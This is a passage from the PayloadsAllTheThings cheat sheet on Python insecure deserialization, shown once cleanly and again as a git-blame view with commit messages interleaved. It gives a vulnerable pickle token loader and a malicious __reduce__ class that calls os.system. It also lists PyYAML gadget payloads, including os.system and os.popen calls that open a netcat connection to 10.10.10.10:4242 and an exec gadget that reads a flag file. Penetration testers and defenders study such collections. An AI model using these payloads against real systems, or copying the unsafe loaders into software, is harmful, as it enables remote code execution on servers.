PayloadsAllTheThings/Insecure Deserialization/Python.md

# Python Deserialization

> Python deserialization is the process of reconstructing Python objects from serialized data, commonly done using formats like JSON, pickle, or YAML. The pickle module is a frequently used tool for this in Python, as it can serialize and deserialize complex Python objects, including custom classes.

## Summary

* [Detection](#detection)
* [Pickle](#pickle)
* [PyYAML](#pyyaml)
* [References](#references)


## Tools

* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)


## Detection

In Python source code, look for these sinks:

* `cPickle.loads`
* `pickle.loads`
* `_pickle.loads`
* `jsonpickle.decode`


## Pickle

The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
:warning: `import cPickle` will only work on Python 2

```python
import cPickle
from base64 import b64encode, b64decode

class User:
    def __init__(self):
        self.username = "anonymous"
        self.password = "anonymous"
        self.rank     = "guest"

h = User()
auth_token = b64encode(cPickle.dumps(h))
print("Your Auth Token : {}").format(auth_token)
```

The vulnerability is introduced when a token is loaded from an user input. 

```python
new_token = raw_input("New Auth Token : ")
token = cPickle.loads(b64decode(new_token))
print "Welcome {}".format(token.username)
```

Python 2.7 documentation clearly states Pickle should never be used with untrusted sources. Let's create a malicious data that will execute arbitrary code on the server.

> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

```python
import cPickle, os
from base64 import b64encode, b64decode

class Evil(object):
    def __reduce__(self):
        return (os.system,("whoami",))

e = Evil()
evil_token = b64encode(cPickle.dumps(e))
print("Your Evil Token : {}").format(evil_token)
```


## PyYAML

YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures.

```yaml
!!python/object/apply:time.sleep [10]
!!python/object/apply:builtins.range [1, 10, 1]
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
!!python/object/new:subprocess [["ls","-ail"]]
!!python/object/new:subprocess.check_output [["ls","-ail"]]
```

```yaml
!!python/object/apply:subprocess.Popen
- ls
```

```yaml
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
  state:
    update: !!python/name:exec
```

Since PyYaml version 6.0, the default loader for `load` has been switched to SafeLoader mitigating the risks against Remote Code Execution. [PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420)

The vulnerable sinks are now `yaml.unsafe_load` and `yaml.load(input, Loader=yaml.UnsafeLoader)`.

```py
with open('exploit_unsafeloader.yml') as file:
        data = yaml.load(file,Loader=yaml.UnsafeLoader)
```


## References

- [CVE-2019-20477 - 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - Manmeet Singh (@_j0lt) - June 21, 2020](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
- [Exploiting misuse of Python's "pickle" - Nelson Elhage - March 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
- [Python Yaml Deserialization - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization)
- [PyYAML Documentation - PyYAML - April 29, 2006](https://pyyaml.org/wiki/PyYAMLDocumentation)
- [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
Insecure deserialization Python 2018-11-27 22:04:17 +00:00			`# Python Deserialization`

Normalize page header for GraphQL, Deserialization, SCM 2024-11-10 13:37:48 +00:00			`> Python deserialization is the process of reconstructing Python objects from serialized data, commonly done using formats like JSON, pickle, or YAML. The pickle module is a frequently used tool for this in Python, as it can serialize and deserialize complex Python objects, including custom classes.`

References added for GWT, GraphQL, HTTP, Headless 2024-11-06 22:32:18 +00:00			`## Summary`

			`* [Detection](#detection)`
			`* [Pickle](#pickle)`
YAML Deserialization 2024-11-17 19:48:10 +00:00			`* [PyYAML](#pyyaml)`
References added for GWT, GraphQL, HTTP, Headless 2024-11-06 22:32:18 +00:00			`* [References](#references)`


YAML Deserialization 2024-11-17 19:48:10 +00:00			`## Tools`

			`* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)`


References added for GWT, GraphQL, HTTP, Headless 2024-11-06 22:32:18 +00:00			`## Detection`

			`In Python source code, look for these sinks:`

			* `cPickle.loads`
			* `pickle.loads`
			* `_pickle.loads`
			* `jsonpickle.decode`

.NET formatters and POP gadgets 2022-11-03 20:31:50 +00:00
Insecure deserialization Python 2018-11-27 22:04:17 +00:00			`## Pickle`

			The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
Add warning about cPickle 2022-04-18 18:58:14 +00:00			:warning: `import cPickle` will only work on Python 2
Insecure deserialization Python 2018-11-27 22:04:17 +00:00
			```python
			`import cPickle`
			`from base64 import b64encode, b64decode`

			`class User:`
			`def __init__(self):`
			`self.username = "anonymous"`
			`self.password = "anonymous"`
			`self.rank = "guest"`

			`h = User()`
			`auth_token = b64encode(cPickle.dumps(h))`
			`print("Your Auth Token : {}").format(auth_token)`
			```

			`The vulnerability is introduced when a token is loaded from an user input.`

			```python
			`new_token = raw_input("New Auth Token : ")`
			`token = cPickle.loads(b64decode(new_token))`
			`print "Welcome {}".format(token.username)`
			```

			`Python 2.7 documentation clearly states Pickle should never be used with untrusted sources. Let's create a malicious data that will execute arbitrary code on the server.`

			`> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.`

			```python
import os 2022-03-24 06:09:34 +00:00			`import cPickle, os`
Insecure deserialization Python 2018-11-27 22:04:17 +00:00			`from base64 import b64encode, b64decode`

			`class Evil(object):`
			`def __reduce__(self):`
			`return (os.system,("whoami",))`

			`e = Evil()`
			`evil_token = b64encode(cPickle.dumps(e))`
			`print("Your Evil Token : {}").format(evil_token)`
			```

References added for GWT, GraphQL, HTTP, Headless 2024-11-06 22:32:18 +00:00
YAML Deserialization 2024-11-17 19:48:10 +00:00			`## PyYAML`

			`YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures.`

			```yaml
			`!!python/object/apply:time.sleep [10]`
			`!!python/object/apply:builtins.range [1, 10, 1]`
			`!!python/object/apply:os.system ["nc 10.10.10.10 4242"]`
			`!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]`
			`!!python/object/new:subprocess [["ls","-ail"]]`
			`!!python/object/new:subprocess.check_output [["ls","-ail"]]`
			```

			```yaml
			`!!python/object/apply:subprocess.Popen`
			`- ls`
			```

			```yaml
			`!!python/object/new:str`
			`state: !!python/tuple`
			`- 'print(getattr(open("flag\x2etxt"), "read")())'`
			`- !!python/object/new:Warning`
			`state:`
			`update: !!python/name:exec`
			```

			Since PyYaml version 6.0, the default loader for `load` has been switched to SafeLoader mitigating the risks against Remote Code Execution. [PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420)

			The vulnerable sinks are now `yaml.unsafe_load` and `yaml.load(input, Loader=yaml.UnsafeLoader)`.

			```py
			`with open('exploit_unsafeloader.yml') as file:`
			`data = yaml.load(file,Loader=yaml.UnsafeLoader)`
			```


Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Insecure deserialization Python 2018-11-27 22:04:17 +00:00
YAML Deserialization 2024-11-17 19:48:10 +00:00			`- [CVE-2019-20477 - 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - Manmeet Singh (@_j0lt) - June 21, 2020](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)`
			`- [Exploiting misuse of Python's "pickle" - Nelson Elhage - March 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)`
			`- [Python Yaml Deserialization - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization)`
			`- [PyYAML Documentation - PyYAML - April 29, 2006](https://pyyaml.org/wiki/PyYAMLDocumentation)`
			`- [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)`